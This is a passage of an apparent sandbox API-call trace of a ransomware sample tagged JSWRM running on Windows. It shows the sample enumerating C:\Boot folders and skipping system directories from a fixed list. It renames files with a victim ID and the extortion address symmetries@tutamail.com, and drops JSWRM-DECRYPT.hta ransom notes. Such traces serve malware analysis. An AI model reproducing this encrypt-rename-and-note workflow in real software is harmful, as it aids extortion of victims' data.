lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0064.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0064.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0064.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0064.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.065] MoveFileW (lpExistingFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.066] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd3407f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cd3407f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cd801e0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.066] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.066] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.066] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.066] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.066] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.067] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.067] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.067] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234336960) returned 0 [0064.067] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.067] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.067] CloseHandle (hObject=0xffffffff) returned 1 [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0064.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0064.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0064.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0064.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.068] MoveFileW (lpExistingFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\nl-NL\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.068] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.068] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0064.069] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2=".") returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="..") returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="...") returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="windows") returned -1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="recovery") returned -1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="perflogs") returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="documents and settings") returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="$RECYCLE.BIN") returned 1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="system volume information") returned -1 [0064.069] lstrcmpiW (lpString1="pl-PL", lpString2="msocache") returned 1 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236db8 [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.069] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pl-pl\\jswrm-decrypt.hta")) returned 0xffffffff [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236db8 | out: hHeap=0x1e0000) returned 1 [0064.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.070] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pl-pl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.070] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.070] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.071] CloseHandle (hObject=0x450) returned 1 [0064.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0064.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.072] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\pl-pl\\jswrm-decrypt.hta")) returned 0x20 [0064.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0064.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.072] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cda66b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232000 [0064.072] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.072] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1cda66b4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.073] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.073] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.073] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.073] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.074] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.074] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0064.074] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, 